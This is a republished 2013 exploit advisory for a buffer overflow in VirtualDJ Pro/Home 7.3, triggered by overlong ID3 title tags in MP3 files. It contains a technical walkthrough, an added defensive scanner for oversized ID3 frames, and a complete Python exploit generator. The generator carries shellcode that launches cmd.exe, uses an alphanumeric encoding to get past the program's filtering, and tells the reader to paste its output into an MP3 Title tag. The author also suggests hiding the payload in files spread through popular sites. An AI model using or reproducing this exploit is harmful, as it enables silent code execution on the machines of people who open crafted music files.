VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
Source: functionmixer.blogspot.com  Author: Alexandro  Published: 2013-04-08

# Exploit Title: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
# Date: 23.03.2013
# Exploit Author: Alexandro Sánchez Bach (functionmixer.blogspot.com)
# Vendor Homepage: http://www.virtualdj.com/
# Software Link: http://www.filehippo.com/en/download_virtualdj/14361/
# Version: VirtualDJ Pro/Home 7.3
# Tested on: Windows XP SP3


# Demo: http://www.youtube.com/watch?v=PJeaWqMJRm0
# Description:

When the user enters a folder, VirtualDJ tries to retrieve all information
from the ID3 tags of the MP3 files inside it, such as "Title", "Album" and
"Artist", and stores it in a buffer. After that, a second buffer of length
4100 is allocated on the stack and only the characters A-Z from the first
buffer are copied to it. According to the ID3 v2.x standard, these tags
can have a length greater than 4100; therefore it is possible to produce a
buffer overflow in this second buffer. At the time the buffer overflow
happens and the program reaches the RETN instruction, the EDI register
points to the first buffer.
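From the defender's side, the condition described above (a text frame longer than the 4100-byte stack buffer) is easy to detect before a file reaches a vulnerable parser. The following scanner is an added example written for this page, not code from the advisory author or from VirtualDJ: it parses ID3v2.3/2.4 text frames ("T***" frame ids such as TIT2, TALB, TPE1), reports any whose payload exceeds the stated 4100-byte limit, and rejects tags whose declared sizes are inconsistent with the file. The function names, the MAX_SAFE_TEXT_FRAME constant and the sample tags are all constructed for the example.

```python
import struct

# Size of the stack buffer the advisory describes; text frames larger than
# this are the ones that can trigger the overflow. (Constant named here.)
MAX_SAFE_TEXT_FRAME = 4100


def syncsafe_to_int(b):
    """Decode a 4-byte ID3v2 syncsafe integer (7 significant bits per byte)."""
    return (b[0] << 21) | (b[1] << 14) | (b[2] << 7) | b[3]


def parse_id3v2_frames(data):
    """Return [(frame_id, payload_bytes)] for an ID3v2.3 or v2.4 tag at the
    start of data; [] if there is no tag. Raises ValueError when the tag
    or a frame declares a size that does not fit in the data."""
    if len(data) < 10 or data[:3] != b"ID3":
        return []
    major, flags = data[3], data[5]
    if major not in (3, 4):
        raise ValueError("unsupported ID3v2 major version %d" % major)
    tag_size = syncsafe_to_int(data[6:10])
    end = 10 + tag_size
    if end > len(data):
        raise ValueError("declared tag size exceeds file length")
    pos = 10
    if flags & 0x40:  # extended header present; skip it
        if major == 4:
            pos += syncsafe_to_int(data[10:14])      # size includes itself
        else:
            pos += struct.unpack(">I", data[10:14])[0] + 4  # size excludes itself
    frames = []
    while pos + 10 <= end:
        fid = data[pos:pos + 4]
        if fid == b"\x00\x00\x00\x00":
            break  # reached padding
        if major == 4:
            size = syncsafe_to_int(data[pos + 4:pos + 8])
        else:
            size = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        payload_start = pos + 10  # 4 id + 4 size + 2 flags
        if payload_start + size > end:
            raise ValueError("frame %r declares a size beyond the tag end" % fid)
        frames.append((fid.decode("latin-1"), data[payload_start:payload_start + size]))
        pos = payload_start + size
    return frames


def find_oversized_text_frames(data, limit=MAX_SAFE_TEXT_FRAME):
    """Return [(frame_id, payload_length)] for every text frame longer than limit."""
    return [(fid, len(p)) for fid, p in parse_id3v2_frames(data)
            if fid.startswith("T") and len(p) > limit]


def is_well_formed(data):
    """True if the tag parses without any size inconsistency."""
    try:
        parse_id3v2_frames(data)
        return True
    except ValueError:
        return False


def build_tag(frames, major=3):
    """Constructed helper: assemble a minimal ID3v2.3 tag from (id, payload) pairs."""
    body = b""
    for fid, payload in frames:
        body += fid.encode("ascii") + struct.pack(">I", len(payload)) + b"\x00\x00" + payload
    n = len(body)
    header = b"ID3" + bytes([major, 0, 0]) + bytes(
        [(n >> 21) & 0x7F, (n >> 14) & 0x7F, (n >> 7) & 0x7F, n & 0x7F])
    return header + body


# Constructed samples: a normal tag and one with a 5001-byte title frame.
BENIGN = build_tag([("TIT2", b"\x00Normal title"), ("TPE1", b"\x00Artist")])
OVERSIZED = build_tag([("TIT2", b"\x00" + b"A" * 5000), ("TALB", b"\x00Album")])

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, "well-formed:", is_well_formed(sample),
              "oversized text frames:", find_oversized_text_frames(sample))
```

A check like this belongs at the boundary where untrusted media enters (an upload handler, a mail gateway, a scanner over a shared library); the limit is the one this advisory states for VirtualDJ, and a different parser would warrant its own threshold.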


We cannot assign EIP the address of the first buffer directly, since it
contains characters which are not in the range A-Z. However, if we take into
account the previous information, we can do this indirectly: we can set
bytes 4100:4104 of the title to "FSFD". After the buffer overflow occurs we
get EIP = "FSFD" = 0x44465346. At this address (inside urlmon.dll) we find
a "CALL EDI" instruction, and so the bytes in the first buffer will be
executed. Now we face another problem. VirtualDJ has inserted a "C3" byte
(RETN) before each non-printable ASCII character in the first buffer, so we
cannot execute the shellcode directly. We can solve this by pushing the
bytes of the shellcode onto the stack using only printable ASCII characters.
Let me explain:


Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (68FFEFFFB8) directly,
we can do exactly the same using only printable ASCII characters
("%@@@@%????-R@D@-R@D@-R@D@-R?C?P"):

AND EAX, 40404040 //2540404040 == "%@@@@"
AND EAX, 3F3F3F3F //253F3F3F3F == "%????" <-- EAX = 0
SUB EAX, 40444052 //2D40444052 == "-R@D@"
SUB EAX, 40444052 //2D40444052 == "-R@D@"
SUB EAX, 40444052 //2D40444052 == "-R@D@"
SUB EAX, 3F433F52 //2D3F433F52 == "-R?C?" <-- EAX = FFEFFFB8
PUSH EAX // 50 == "P"

Once all the bytes of the shellcode have been pushed onto the stack (in reverse
order) we use PUSH ESP (0x54 == "T") and RETN (0xC3) to run the shellcode.
This time it doesn't matter if VirtualDJ inserts another 0xC3 byte before
this one.


I think this is a pretty serious vulnerability since VirtualDJ is
considered the #1 software for mixing music, with millions of downloads
around the world. By exploiting this vulnerability it would be possible to
spread malware quickly just by uploading a malicious MP3 file to a
popular site. Even worse, I guess this file wouldn't be detected by any
antivirus. It should also be possible to "hide" the bytes of the exploit
behind the real title of the MP3 file and a lot of spaces. Because of that,
I hope they fix this as soon as possible.

#Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
#By: Alexandro Sánchez Bach | functionmixer.blogspot.com
#More info: http://www.youtube.com/watch?v=PJeaWqMJRm0

import string


def unicodeHex(c):
    c = hex(ord(c))[2:].upper()
    if len(c)==1:
        c = "0"+c
   
    return c+"00"


def movEAX(s):
    #Arrays
    s = map(ord, list(s))
    inst = []
    target = [512, 512, 512, 512]
    carry  = [0,-2,-2,-2]
    for i in range(4):
        if s[i] < 0x10:
            target[i] = 256
            if i < 3:
                carry[i+1] = -1
    diff = [target[b] - s[b] for b in range(4)]

    #Gen instructions
    for i in range(3):
        target = [target[b] - diff[b]/4 for b in range(4)]
        inst += [[diff[b]/4 for b in range(4)]]
    target = [target[b] - s[b] + carry[b] for b in range(4)]
    inst += [target]
   
    #Remove character '\'
    for b in range(4):
        if ord("[")  in [inst[i][b] for i in range(4)] or \
           ord("\\") in [inst[i][b] for i in range(4)] or \
           ord("]")  in [inst[i][b] for i in range(4)]:
            for i in range(4):
                inst[i][b] = inst[i][b]+5*((-1)**(i))
   
    inst  = ["\x2D"+"".join(map(chr, i)) for i in inst]
    return "".join(inst)


#Shellcode: Run cmd.exe
shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2
shellcode += retAddress

while len(shellcode) % 4 != 0:
    shellcode += '\x90'
   

exploit = ""
for i in range(0,len(shellcode),4)[::-1]:
    exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F"  #EAX = 0
    exploit += movEAX(shellcode[i:i+4])  #EAX = shellcode[i:i+4]
    exploit += "\x50"  #PUSH EAX
exploit += '\x54' #PUSH ESP
exploit += '\xC3' #RET


c = 0
for i in exploit:
    if i in string.ascii_letters:
        c+=1
exploit +=  "A"*(4100-c)
exploit += "FSFD"

print exploit
#Paste the generated code in the tag 'Title' of the MP3 file.


CopyRight © 2002-2022 VFocuS.Net All Rights Reserved